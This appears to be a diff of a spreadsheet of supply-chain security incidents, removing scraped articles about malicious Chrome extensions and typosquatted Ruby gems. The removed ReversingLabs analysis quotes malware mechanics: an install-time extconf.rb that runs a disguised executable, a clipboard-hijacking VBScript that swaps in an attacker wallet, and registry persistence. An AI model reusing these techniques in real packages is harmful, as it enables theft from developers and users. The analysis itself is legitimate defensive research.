'safe', 'chrome', 'extension', 'ecosystem', 'perfect', 'example', 'research', 'facilitate', 'researcher', 'bumblebreache', 'large', 'scale', 'campaign', 'copycat', 'chrome', 'extension', 'user', 'datum', 'malvertising', 'fraud', 'detection', 'chrome', 'store', 'extension', 'other', 'removed', 'campaign', 'chrome', 'extension', 'operating', 'manner', 'legitimate', 'investigation', 'infect', 'user', 'browser', 'datum', 'part', 'large', 'campaign', 'extension', 'advertising', 'service', 'network', 'copycat', 'plugin', 'identical', 'functionality', 'collaboration', 'able', 'dozen', 'extension', 'matching', 'pattern', 'user', 'concern', 'receptive', 'responsive', 'report', 'report', 'validate', 'finding', 'fingerprint', 'extension', 'entire', 'chrome', 'store', 'remove', 'related', 'extension', 'work', 'research', 'community', 'extension', 'store', 'violate', 'policy', 'action', 'incident', 'training', 'material', 'manual', 'analysis', 'sweep', 'extension', 'similar', 'technique', 'code', 'behavior', 'extension', 'policy', 'malvertising', 'malicious', 'actor', 'legitimate', 'internet', 'activity', 'exploit', 'dropper', 'command', 'popular', 'advertising', 'cookie', 'redirect', 'callback', 'evade', 'detection', 'technique', 'malvertising', 'common', 'infection', 'vector', 'experience', 'today', 'prominent', 'year', 'malvertising', 'program', 'vehicle', 'multiple', 'form', 'fraudulent', 'activity', 'exfiltration', 'phishing', 'monitoring', 'exploitation', 'multipart', 'malicious', 'campaign', 'collection', 'defraudment', 'evident', 'recent', 'writeup', 'independent', 'multipart', 'malvertising', 'campaign', 'example', 'recent', 'fake', 'jquery', 'campaign', 'prominence', 'malvertising', 'attack', 'vector', 'trackingbased', 'advertising', 'ubiquitous', 'user', 'underserved', 'protection', 'mechanism', 'behavior', 'browser', 'extension', 'weak', 'point', 'individual', 'privacy', 'potential', 'misuse', 'general', 'guise', 'helpful', 'application', 'case', 'chrome', 'extension', 'creator', 'extension', 'advertising', 'functionality', 'user', 'order', 'browser', 'client', 'command', 'control', 'architecture', 'private', 'datum', 'user', 'knowledge', 'user', 'risk', 'advertising', 'stream', 'attempt', 'chrome', 'store', 'fraud', 'detection', 'mechanism', 'crxcavator', 'analysis', 'general', 'help', 'architecture', 'operation', 'malicious', 'extension', 'extension', 'system', 'datum', 'answer', 'time', 'break', 'function', 'architecture', 'singular', 'actor', 'last', 'year', 'potential', 'activity', 'early', 'additional', 'pattern', 'main', 'site', 'description', 'exact', 'name', 'plugin', 'com', 'contact', 'information', 'support', 'information', 'extension', 'source', 'code', 'plugin', 'identical', 'substantial', 'difference', 'source', 'code', 'name', 'large', 'number', 'similar', 'plugin', 'service', 'likely', 'single', 'change', 'function', 'name', 'similarity', 'plugin', 'detection', 'mechanism', 'similarity', 'code', 'plugin', 'advertisement', 'crusharcade', 'reference', 'site', 'reference', 'network', 'crush', 'arcade', 'name', 'right', 'reference', 'version', 'similar', 'notation', 'code', 'plugin', 'section', 'length', 'level', 'permission', 'plugin', 'high', 'identical', 'access', 'large', 'amount', 'datum', 'browser', 'addition', 'external', 'site', 'identical', 'plugin', 'exception', 'plugin', 'front', 'site', 'call', 'site', 'name', 'partial', 'list', 'document', 'regular', 'interval', 'instruction', 'uninstall', 'sandbox', 'plugin', 'site', 'site', 'user', 'plugin', 'legitimate', 'behavior', 'sandbox', 'user', 'machine', 'contact', 'plugin', 'site', 'acctrdomain', 'code', 'first', 'command', 'control', 'domain', 'user', 'host', 'asynchronous', 'interval', 'domain', 'instruction', 'location', 'datum', 'domain', 'feed', 'list', 'advertisement', 'future', 'redirect', 'example', 'communication', 'host', 'command', 'site', 'memory', 'host', 'host', 'direction', 'operation', 'data', 'update', 'redirection', 'stream', 'upload', 'datum', 'exchange', 'domain', 'transaction', 'exchange', 'limited', 'various', 'usage', 'time', 'idle', 'activity', 'browser', 'activity', 'statistic', 'advertising', 'course', 'general', 'consent', 'config', 'update', 'control', 'domain', 'settlesignaljs', 'host', 'primary', 'malicious', 'activity', 'fraud', 'redirection', 'stream', 'host', 'site', 'actor', 'screenshot', 'general', 'variant', 'word', 'randomdomain', 'vowel', 'humancreated', 'word', 'machine', 'operation', 'user', 'redirector', 'domain', 'batch', 'multiple', 'early', 'domain', 'hour', 'signal', 'host', 'series', 'stream', 'legitimate', 'illegitimate', 'end', 'domain', 'section', 'numerous', 'list', 'large', 'portion', 'benign', 'stream', 'good', 'fraud', 'legitimate', 'large', 'volume', 'content', 'fact', 'user', 'many', 'majority', 'fact', 'malicious', 'thirdparty', 'actor', 'stream', 'redirect', 'user', 'phishing', 'end', 'domain', 'site', 'site', 'legitimate', 'percent', 'time', 'redirect', 'stream', 'reference', 'malicious', 'site', 'malicious', 'domain', 'multiple', 'time', 'disparate', 'user', 'research', 'plugin', 'primary', 'intention', 'plugin', 'point', 'redirection', 'stream', 'order', 'revenue', 'user', 'additional', 'risk', 'infection', 'phishing', 'redirect', 'volume', 'redirect', 'oscillate', 'point', 'user', 'plugin', 'datum', 'internal', 'revenue', 'user', 'machine', 'component', 'actor', 'ultimate', 'registrant', 'plugin', 'site', 'site', 'redirector', 'site', 'config', 'site', 'actor', 'worth', 'redirect', 'time', 'intelligence', 'vendor', 'part', 'infrastructure', 'malicious', 'phishing', 'exception', 'state', 'context', 'year', 'open', 'resource', 'able', 'direct', 'malware', 'plugin', 'site', 'different', 'design', 'function', 'user', 'plugin', 'architecture', 'similarity', 'reference', 'domain', 'report', 'indicator', 'proprietary', 'sandbox', 'multiple', 'instance', 'malware', 'site', 'redirector', 'domain', 'hash', 'classified', 'virustotal', 'gamevance', 'softwareadware', 'plugin', 'proliferation', 'actor', 'detection', 'instance', 'user', 'trace', 'software', 'particular', 'association', 'tangential', 'clock', 'observation', 'time', 'research', 'actor', 'active', 'month', 'activity', 'dozen', 'variant', 'plugin', 'domain', 'infrastructure', 'monthly', 'possible', 'actor', 'active', 'malware', 'domain', 'traffic', 'multiple', 'portion', 'architecture', 'support', 'plugin', 'network', 'month', 'component', 'redirector', 'domain', 'chunk', 'instruction', 'domain', 'particular', 'behavior', 'redirector', 'domain', 'various', 'time', 'multiple', 'pair', 'similar', 'time', 'redirector', 'domain', 'midapril', 'redirector', 'domain', 'early', 'domain', 'recent', 'domain', 'variance', 'level', 'information', 'registrar', 'field', 'redirector', 'domain', 'email', 'registration', 'field', 'reverse', 'lookup', 'registration', 'many', 'potential', 'phishing', 'site', 'enough', 'investigation', 'able', 'work', 'finding', 'much', 'datum', 'able', 'duo', 'free', 'chrome', 'extension', 'assessment', 'tool', 'duo', 'mission', 'different', 'chrome', 'extension', 'organization', 'potential', 'risk', 'extension', 'user', 'endpoint', 'browserextension', 'expert', 'organization', 'size', 'secure', 'learn', 'tool', 'check', 'blog', 'post', 'bright', 'future', 'user', 'privacy', 'policy', 'secure', 'handling', 'requirement', 'guideline', 'extension', 'user', 'datum', 'privacy', 'policy', 'gain', 'consent', 'user', 'minimum', 'amount', 'permission', 'enforcement', 'developer', 'reward', 'program', 'bounty', 'people', 'extension', 'policy', 'upcoming', 'manifest', 'step', 'user', 'privacy', 'great', 'stride', 'user', 'base', 'conclusion', 'outcome', 'research', 'collaboration', 'real', 'world', 'risk', 'chrome', 'extension', 'utility', 'crxcavator', 'tool', 'researcher', 'vulnerability', 'chrome', 'extension', 'user', 'browser', 'store', 'user', 'browser', 'extension', 'attack', 'vector', 'impact', 'user', 'part', 'good', 'hygiene', 'user', 'extension', 'remove', 'one', 'one', 'mindful', 'access', 'accessible', 'information', 'extension', 'enterprise', 'user', 'safe', 'index', 'type', 'domain', 'mapsscoutcom', 'plugin', 'domain', 'domain', 'domain', 'supersimpletoolscom', 'plugin', 'domain', 'domain', 'domain', 'domain', 'domain', 'domain', 'gamedaddio', 'domain', 'plugin', 'domain', 'domain', 'plugin', 'domain', 'domain', 'plugin', 'domain', 'plugin', 'domain', 'domain', 'deterministic', 'domain', 'redirector', 'redirector', 'redirector', 'redirector', 'domain', 'redirector', 'domain', 'rnddmncom', 'redirector', 'domain', 'redirector', 'domain', 'rdcnewcom', 'redirector', 'domain', 'redirector', 'domain', 'redirector', 'redirector', 'domain', 'redirector', 'redirector', 'domain', 'redirector', 'domain', 'redirector', 'domain', 'redirector', 'domain', 'redirector', 'domain', 'redirector', 'domain', 'redirector', 'domain', 'gluedccom', 'redirector', 'domain', 'redirector', 'redirector', 'redirector', 'redirector', 'domain', 'domain', 'sponsergiftpro', 'domain', 'domain', 'domain', 'usavisitorrewardscom', 'domain', 'usavisitorsorg', 'domain', 'name', 'promediaconverter', 'promotion', 'plugin', 'name', 'plugin', 'name', 'crusharcade', 'plugin', 'name', 'plugin', 'name', 'arcadefronti', 'plugin', 'name', 'mapsfronti', 'advertising', 'plugin', 'name', 'supersimpletool', 'plugin', 'name', 'advertisement', 'name', 'packtrackplus', 'plugin', 'name', 'plugin', 'name', 'plugin', 'name', 'plugin', 'name', 'gamezook', 'promotion', 'plugin', 'name', 'promotion', 'plugin', 'name', 'mapsfronti', 'advertisement', 'plugin', 'name', 'expressdirection', 'plugin', 'name', 'plugin', 'name', 'plugin', 'name', 'plugin', 'name', 'plugin', 'name', 'expressdirection', 'plugin', 'name', 'plugin', 'name', 'mapsvoyage', 'promotion', 'plugin', 'promotion', 'name', 'earthviewdirection', 'promotion', 'plugin', 'name', 'mapsfronti', 'advertisement', 'plugin', 'name', 'plugin', 'name', 'promos', 'plugin', 'name', 'promotion', 'plugin', 'name', 'mapsfronti', 'plugin', 'name', 'promotion', 'plugin', 'name', 'mapsvoyage', 'plugin', 'name', 'advertising', 'mapsfronti', 'plugin', 'name', 'plugin', 'name', 'advertising', 'mapsvoyage', 'plugin', 'name', 'mapsfronti', 'advertising', 'plugin', 'name', 'advertisement', 'plugin', 'name', 'expressdirection', 'plugin', 'name', 'promotion', 'name', 'mapsvoyage', 'advertising', 'plugin', 'name', 'mapspilot', 'plugin', 'name', 'gofreeradio', 'plugin', 'name', 'advertising', 'freeweatherapp', 'plugin', 'name', 'advertisement', 'quizkick', 'plugin', 'name', 'mapsvoyage', 'plugin', 'name', 'advertising', 'plugin', 'name', 'mapsscout', 'advertising', 'plugin', 'name', 'deluxequiz', 'advertising', 'plugin', 'name', 'supersimpletool', 'plugin', 'name', 'advertising', 'mapspilot', 'plugin', 'name', 'advertisement', 'plugin', 'name', 'plugin', 'name', 'froovr', 'plugin', 'name', 'name', 'gamedaddio', 'marketing', 'plugin', 'name', 'advertising', 'plugin', 'name', 'mapsscout', 'plugin', 'name', 'advertisement', 'name', 'advertisment', 'gamedaddio', 'plugin', 'name', 'quizflavor', 'advertising', 'plugin', 'name', 'advertisement', 'quizdiamond', 'plugin', 'name', 'quizpremium', 'advertisement', 'plugin', 'name', 'couponrockstar', 'plugin', 'name', 'mapsfronti', 'promos', 'plugin', 'name', 'advertising', 'mapspilot', 'plugin', 'name', 'playthunder', 'plugin', 'name', 'plugin', 'name', 'oanbpfkcehelcjjipodkaafialmfejmi', 'plugin', 'plugin', 'mjchijabihjkhmmaaihpgmhkklgakinl', 'ofpihhkeakgnnbkmcoifjkkhnllddbld', 'plugin', 'plugin', 'nchdkdaknojhpimbfbejfcdnmjfbllhj', 'plugin', 'plugin', 'icolkoeolaodpjogekifcidcdbgbdobc', 'plugin', 'plugin', 'nfhpojfdhcdmimokleagkdcbkmcgfjkh', 'plugin', 'plugin', 'plugin', 'obmbmalbahpfbckpcfbipooimkldgphm', 'ehibgcefkpbfkklbpahilhicidnhiboc', 'plugin', 'gmljddfeipofcffbhhcpohkegndieeab', 'plugin', 'fekjbjbbdopogpamkmdjpjicapclgamj', 'plugin', 'hash', 'map', 'plugin', 'name', 'pattern', 'promos', 'plugin', 'name', 'pattern', 'pack', 'plugin', 'name', 'pattern', 'plugin', 'name', 'pattern', 'plugin', 'name', 'pattern', 'advertising', 'plugin', 'name', 'pattern', 'plugin', 'name', 'pattern', 'quiz', 'plugin', 'name', 'pattern', 'marketing', 'plugin', 'name', 'pattern', 'promotion', 'plugin', 'name', 'pattern', 'advertisement', 'plugin', 'name', 'pattern', 'sczp', 'redirector', 'pattern', 'fzsp', 'redirector', 'pattern', 'search', 'product', 'capability', 'mobile', 'method', 'single', 'signon', 'device', 'trust', 'remote', 'access', 'passwordless', 'trust', 'customer', 'state', 'local', 'government', 'federal', 'government', 'enterprise', 'small', 'medium', 'business', 'edition', 'partnership', 'edition', 'free', 'essential', 'premier', 'ready', 'partner', 'partnership', 'program', 'technology', 'partner', 'program', 'service', 'provider', 'solution', 'provider', 'doc', 'support', 'doc', 'admin', 'overview', 'user', 'guide', 'doc', 'edition', 'doc', 'integration', 'support', 'support', 'system', 'status', 'user', 'user', 'administrator', 'knowledge', 'base', 'community', 'forum', 'resource', 'resource', 'news', 'press', 'event', 'demand', 'event', 'webinar', 'ebook', 'video', 'interactive', 'demos', 'infosec', 'glossary', 'international', 'resource', 'language', 'language', 'term', 'service', 'privacy', 'statement', 'privacy', 'datum', 'sheet', 'copyright', 'dispute', 'policy', 'service', 'level', 'agreement', 'response', 'business', 'continuity', 'covid19', 'cookie']</t>
         </is>
       </c>
     </row>
@@ -3960,17 +3434,12 @@
       </c>
       <c r="C136" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rubygems rubygemsorg public notifications fork star code issues pull requests discussions actions wiki insights additional navigation options code issues pull requests discussions actions wiki insights gems yanked accounts locked jump bottom aditya prakash edited page revisions select scenarios published could yanked account locked rubygemsorg team members creates backdoor remote code execution steals sensitive information host like http cookies contains code malware wiki document yanked gems accounts locked along rationale action account locked petergibbons2 yanked httpsrubygemsorggemsprettycolorversions081 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs account locked mikejudge yanked httpsrubygemsorggemsrubybitcoinversions0020 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs february accounts locked petergibbons jimcarrey yanked httpsgistgithubcomcolbyswandale11dadff435b02f887fc68178cd4fb0dc april yanked related httpsgithubcomrubygemsrubygemsorgissues1959 scriptyankgem yanking honeybadger initializing honeybadger error tracker ruby ship version460 frameworkrails level1 pid1361 yanking newer version available please upgrade ruby done yanked basicauthable related httpshelprubygemsorgdiscussionsproblems37137 yanking basicauthable done accounts locked davidspade mclovin mwmanning yanked restclient related httpsgithubcomrubygemsrubygemsorgissues2097 scriptyankuser mclovin yanking bitcoinvanity yanking litacoin yanking comingsoon yanking omniauthamazon scriptyankuser davidspade yanking cronparser yanking coinbase yanking blockchainwallet yanking awesomebot yanking dogecoin yanking capistranocolors july account locked homografo gems yanked gems shaggy owner reason names invalid levenshtein rule related httpsgistgithubcomsonalkr1320af1746c14b42a41e01d20fffbed585b june account locked shaggy gems yanked gems shaggy owner reason gems contain code crypto mining cookiepassword stealing related rubygemsrubygemsorg2034 june account locked cryptice yanked versions passen reason latest version passen code cookie stealing related helprubygemsorg36541 toggle tagle contents pages home brainstorming contribution guidelines create development setup gems yanked accounts locked february april july june june help standup gemcutter owner problem webhooks ideas clone wiki locally footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>colby-swandale Gem yanked for unspecified reason</t>
         </is>
       </c>
       <c r="D136" t="inlineStr">
         <is>
           <t>https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#27-february-2020</t>
-        </is>
-      </c>
-      <c r="E136" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rubygem', 'public', 'notification', 'star', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'gem', 'account', 'jump', 'bottom', 'aditya', 'prakash', 'page', 'revision', 'scenario', 'account', 'rubygemsorg', 'team', 'member', 'backdoor', 'remote', 'code', 'execution', 'sensitive', 'information', 'host', 'http', 'cookie', 'code', 'malware', 'document', 'gem', 'account', 'rationale', 'action', 'account', 'reason', 'code', 'beautification', 'account', 'reason', 'code', 'beautification', 'account', 'petergibbon', 'jimcarrey', 'scriptyankgem', 'honeybadger', 'honeybadger', 'error', 'pid1361', 'new', 'version', 'available', 'basicauthable', 'basicauthable', 'account', 'restclient', 'bitcoinvanity', 'litacoin', 'yanking', 'comingsoon', 'cronparser', 'coinbase', 'dogecoin', 'yanking', 'capistranocolor', 'account', 'homografo', 'gem', 'gem', 'owner', 'reason', 'invalid', 'account', 'shaggy', 'gem', 'gem', 'owner', 'reason', 'gem', 'code', 'mining', 'account', 'cryptice', 'version', 'passen', 'reason', 'late', 'version', 'code', 'cookie', 'toggle', 'content', 'page', 'home', 'brainstorming', 'contribution', 'guideline', 'development', 'setup', 'gem', 'account', 'idea', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -3987,17 +3456,12 @@
       </c>
       <c r="C137" t="inlineStr">
         <is>
-          <t>buyer’s guide software supply chain download sboms moment hear make actionable save spot gartner® report mitigate enterprise software supply chain risks insights solutions software supply chain spectra assure procurement spectra assure build release automate support triage incident response siemsoar protect cloud file shares optimize hunting ransomware feed malware hunting sandbox email intelligence platform intelligence platform microsoft sentinel product technology product technology titanium platform spectra assure software supply chain reversinglabs intelligence reversinglabs elastic infrastructure reversinglabs analysis hunting free open source yara rules integrations partners partners become partner value added partners marketplaces alliances reversinglabs synopsys resources resources blog content library webinars software deconstruction demo series reversingglass concepts explained conversinglabs podcast labs yara rules demo videos learning reversinglabs company company leadership careers series investment company news events events press press releases news demo contact support login blog developer portal search reversinglabs blog research april mining malicious ruby gems typosquatting barrage rubygems software repository users blog author tomislav maljic analyst reversinglabs read days organizations acknowledging importance aspect systems putting effort adopt best practices goal eliminating blindspots attack chain would increase risk incident happening makes harder actors achieve malicious intentions attacking organizations directly less likely yield results bypass measures actors always lookout attack vectors vector referred software supply chain attack becoming increasingly popular attacks threaten organizations indirectly targeting thirdparty vendors provide software services since vendors typically considered trusted publishers organizations tend spend less time verifying packages consuming indeed malwarefree theres implicit trust software vendor clients case that’s exactly software supply chain attacks subvert open source repositories also fall category particularly interesting used millions developers around world work organizations opensource technologies accelerate development commercial software packaged libraries opensource components represent basic application building blocks depending complexity software organization building many thirdparty libraries used final product modern software development centered around idea thirdparty components reusable easily accessible components thus organized hosted software delivery mechanisms called package repositories closely integrated programming languages repositories make easy consume manage thirdparty components consequently including another project dependency become easy clicking button running simple command developer environment clicking button running simple command sometimes dangerous thing actors also share interest convenience little surprise hear package repositories increasingly targeted couple ways carry attacks compromising developer accounts build environments typosquatting package names typosquatting particularly interesting using type attack actors intentionally name malicious packages resemble popular ones closely possible rspecmokcs instead rspecmocks hopes unsuspecting user mistype name unintentionally install malicious package instead reversinglabs curious naming discrepancies could detected package repositories started analyze idea already proven merit successfully discovered malicious packages within pypi repositories reported previous blogs time weve expanded research efforts include rubygems repository continuous analysis quickly research showed results we’ve detected malicious ruby packages using repository monitoring logic rubygems package manager ruby programming language according site statistics repository contains around thousand packages called gems nearly billion total downloads generally speaking file tape archive basic structure follows directory contains binaries exist directory contains code test directory contains tests rakefile used rake makelike program implemented ruby automate tests generate code gemspec file contains basic metadata author version description also include additional information extensions come handy later pypi analysis focused largescale repository analysis rubygems employed slightly different approach monitored ingestion queue typosquatted names sent gems processing titanium platform precise crafted list popular gems baseline weekly basis collected gems newly pushed rubygems repository detected similar name baseline list gems flagged interesting analysis processing gems titanium platform vital step extracts files archives among formats produces valuable metadata factor analysis first week monitoring flagged gems interesting gems processed single server epyc core processor processing took minute seconds precise titanium platform managed unpack files unique looking breakdown interesting file types subtypes found analysis found everything however thing stands number portable executable files figure file types extracted objects files legitimate purpose packages typically warrant closer look every processed contained executable filename aaapng extension raises alarm assume used masquerade executable file image file detailed look revealed every “aaapng” file executable located path every exttrellislikeunflamingwaffling figure rubygems package contents visualized reversinglabs a1000 looking rubygems repository discovered gems originated user accounts “jimcarrey” “petergibbons” fairly high number total downloads seemed caught redhanded account “petergibbons” actively adding typosquatted gems time analysis overall gems uploaded rubygems site february 16th 25th figure petergibbons jimcarrey statistics rubygems site typosquatted atlasclient stands rest download count seems actor probably succeeded intent deceive unsuspecting users illustrated figures malicious downloads close total downloads legitimate “atlasclient” time reporting rubygems team figure download count typosquatted “atlasclient” legit “atlasclient” extensions mentioned earlier also found gemspec files used wrap separate libraries written ruby wrapper convention extensions used everything related placed directory along extconfrb file extconfrb file configures makefile builds extension installation however extensions also utilized malicious purposes allowing malware execute without user interaction take closer look gemspec file atlasclient uses extensions following line code specextensions exttrellislikeunflamingwafflingextconfrb extconfrb script located path exttrellislikeunflamingwaffling “aaapng” file used check target platform runs windows system rename “aaapng” file “aexe” execute figure content extconfrb script detailed analysis “aaapng” executable extracted “atlasclient” reveals crafted using ocra ruby2exe tool ocra used generate selfextracting windows executable file contains ruby script ruby interpreter required dependencies scripts dependencies compressed lzma compression algorithm extracted ruby script “aaarb” “aaapng” executable contains base64encoded vbscript figure decoded saved “ohvbs” file figure figure base64 encoded malicious vbscript figure decoded malicious vbscript script rather simple first creates vbscript file main malicious loop “programdatamicrosoft essentialssoftware essentialsvbs” path persistence mechanism creates autorun registry “hcusoftwaremicrosoftwindowscurrentversionrun microsoft software essentials” malware ensures every time system started rebooted “software essentialsvbs” malicious script executed starts infinite loop captures user’s clipboard data following lines code objhtml createobjecthtmlfile text objhtmlparentwindowclipboarddatagetdatatext script checks clipboard data matches format cryptocurrency wallet address replaces address attackercontrolled “1jku5xdnlji4ugbb8agewl1ko5us42nnmc” hidden window using following command wscriptshell cwindowssystem32cmdexe echo 1jku5xdnlji4ugbb8agewl1ko5us42nnmc clip actor trying redirect potential cryptocurrency transactions wallet address time writing blog seemingly transactions made wallet figure highlevel malware workflow believe actor responsible least previous malicious campaigns rubygems repository file path “exttrellislikeunflamingwaffling” used attacks likewise malicious intent related cryptomining cases unclear rubygems repository continuously barraged actor since attacks using windows technologies campaign specific individuals order succeed perfect candidate succumb type “sprayandpray” supply chain attack ruby developer whose environment choice windows system that’s also periodically used make bitcoin transactions rare breed indeed certainly isnt rare days software supply chain attacks every software distribution platform comes risks mitigating challenging task fallen shoulders operation centers business process enablers need ensure developer environments code organization shipping times need reversinglabs technology provider meets challenges modern software development edge titanium platform unique piece static analysis technology breath format coverage ability inspect kind content hosted open source package repositories analytical capabilities look malware could lurking within format inspects comes quirks even implications that’s platform provides unified view software packages composition configuration respective digital signatures mitigations please reach schedule demo learn next generation technologies designed specifically prevent software supply chain attacks rubygems team contacted packages reported users removed repository read additional repository attacks blogs package walked away passwords suppy chain malware detecting malware package manager repositories fragment affected packages sha256 atlasclient 4d1898ea858beff245b9cbe7502ac4dd1be76b656299378e693f3d1068e56564 appiumlib 4feb512e2aa9dd3847b36f0d76ae054bb2409a4ef145092160de666910b51798 actionmailercachedelivery 61abc946cb1c8c3d930793e5b57ae07b1c1d0fc651f6b8f9f82748839d994001 activemodelvalidators 62801bbd9af0c97fd4a6cd9a1db5fdf24264f8ff8ca22254f442565c68c517f1 asciidoctorbibliography 8064b41c7bee7c5fc4ffc65688bc57e9cea26f22c1afcf2b733399123484282e assetspipeline 291d5764122658d99bf299b69dee196f9433fd5198dd8477ef674c26fe51ff1e apressvalidators f5de35b5b3bc1f1e1436b803b75988931491105fbb66aeee8926742a4cb88be0 aroctopusreplicationtracking 4023335e798a54233b64eab72905acc77dc2b970dcb37f4c8e150d2c41f3d0a5 aliyunopensearch b2b80a4ff1e7dc67cd9b824aba2cd47292432ace319929e10769652ffef0b030 aliyunmns 4a3fadbaf108fe76b1fa890c7eed2f7c541d0e96f3d5c5ec6fd4d3b0dcb8ced1 absplit f8edc0358d0661e46d4187e7f41ea07fb72160381cd4c514e8779c85792d2b38 apnspolite af799688a4d7cf9d4a65cf29eeea95fa9261a5141671daf61fc0c17814a51f6c affected packages httpsblogreversinglabscomhubfsblogrubymaliciousgemstxt iocs aaapng executable file 9d1fcea3079826ca48641ddbd360698c877ec2d09d973c5602676dae26be7c3f aaarb 298e35a96f4cc79ed3fd5e18337d22fd272798f60360fe1e3ca3346ef18e69f7 ohvbs b303e55ddd6985f8550af85a602cf745adebc7f3db60a7f52ea53fd0b675df47 disclosure timeline contacted rubygems team rubygems team removes packages speed trends understand landscape state software supply chain plus learn reversinglabs spectra assure software supply chain keep learning update understanding buyers guide software supply chain join webinar need upgrade appsec report take action state supply chain join discussion state software supply chain webinar gartners guidance managing software supply chain risk tags research research blog posts appsec supply chain march software supply chain numbers stats matter understand state software supply chain takeaways recent research surveys application development pros read research march suspicious nuget package grabs data industrial systems espionage long driver malicious cyber campaigns heres research team knows suspicious sqzrframework480 campaign read devsecops march memorysafe languages design insights lessons learned memory safety stubborn dangerous software weaknesses insights takeaways google report issue read topics blog posts appsec supply chain devsecops research operations products technology company events follow youtube linkedin subscribe best blog delivered inbox weekly stay date trends analysis best practices across intelligence software supply chain special reports state software supply chain january latest blog posts securing medical devices sboms conversations hunting software supply chain reproducible builds graduate software supply chain glassboard conversations reversinglabs field ciso matt rose software package deconstruction video conferencing software analyzing risks software supply chain software supply chain hotline need immediate assistance software supply chain issue contact sscs incident response blog webinars demo videos events news glossary careers contact privacy policy cookies rights reserved reversinglabs</t>
+          <t>The RubyGems.org codebase was searched for typosquatting packages that contained malware, and over 700 instances were found.</t>
         </is>
       </c>
       <c r="D137" t="inlineStr">
         <is>
           <t>https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems</t>
-        </is>
-      </c>
-      <c r="E137" t="inlineStr">
-        <is>
-          <t>['buyer', 'guide', 'software', 'supply', 'chain', 'download', 'moment', 'actionable', 'spot', 'report', 'enterprise', 'software', 'supply', 'chain', 'risk', 'insight', 'solution', 'software', 'supply', 'chain', 'procurement', 'spectra', 'build', 'release', 'automate', 'support', 'triage', 'incident', 'response', 'protect', 'cloud', 'file', 'share', 'ransomware', 'feed', 'sandbox', 'email', 'intelligence', 'platform', 'intelligence', 'platform', 'product', 'technology', 'product', 'technology', 'titanium', 'platform', 'assure', 'software', 'supply', 'chain', 'elastic', 'infrastructure', 'analysis', 'free', 'open', 'source', 'yara', 'rule', 'partner', 'partner', 'partner', 'value', 'partner', 'marketplace', 'alliance', 'resource', 'resource', 'blog', 'content', 'library', 'software', 'deconstruction', 'demo', 'series', 'reversingglass', 'concept', 'rule', 'video', 'company', 'company', 'leadership', 'career', 'series', 'investment', 'company', 'news', 'event', 'event', 'press', 'release', 'news', 'demo', 'contact', 'support', 'login', 'blog', 'developer', 'portal', 'search', 'reversinglab', 'blog', 'research', 'mining', 'malicious', 'ruby', 'gem', 'barrage', 'software', 'repository', 'user', 'blog', 'day', 'organization', 'importance', 'aspect', 'system', 'effort', 'good', 'practice', 'goal', 'blindspot', 'attack', 'chain', 'risk', 'incident', 'happening', 'hard', 'actor', 'malicious', 'intention', 'organization', 'likely', 'result', 'bypass', 'measure', 'actor', 'attack', 'vector', 'vector', 'software', 'supply', 'chain', 'attack', 'popular', 'attack', 'organization', 'thirdparty', 'vendor', 'software', 'service', 'vendor', 'publisher', 'organization', 'less', 'time', 'package', 'malwarefree', 'implicit', 'trust', 'software', 'vendor', 'client', 'case', 'software', 'supply', 'chain', 'attack', 'open', 'source', 'repository', 'category', 'interesting', 'million', 'developer', 'world', 'work', 'organization', 'opensource', 'technology', 'development', 'commercial', 'software', 'library', 'opensource', 'component', 'basic', 'application', 'building', 'block', 'complexity', 'software', 'organization', 'many', 'thirdparty', 'library', 'final', 'product', 'modern', 'software', 'development', 'idea', 'thirdparty', 'component', 'reusable', 'accessible', 'component', 'software', 'delivery', 'mechanism', 'package', 'repository', 'programming', 'language', 'repository', 'easy', 'consume', 'thirdparty', 'component', 'project', 'dependency', 'easy', 'clicking', 'button', 'simple', 'command', 'developer', 'environment', 'button', 'simple', 'command', 'dangerous', 'thing', 'actor', 'interest', 'convenience', 'little', 'surprise', 'package', 'repository', 'couple', 'way', 'attack', 'developer', 'account', 'environment', 'package', 'name', 'interesting', 'type', 'attack', 'actor', 'malicious', 'package', 'popular', 'one', 'possible', 'rspecmokcs', 'unsuspecting', 'user', 'mistype', 'name', 'malicious', 'package', 'curious', 'naming', 'discrepancy', 'package', 'repository', 'idea', 'merit', 'malicious', 'package', 'repository', 'previous', 'blog', 'time', 'research', 'effort', 'rubygem', 'continuous', 'analysis', 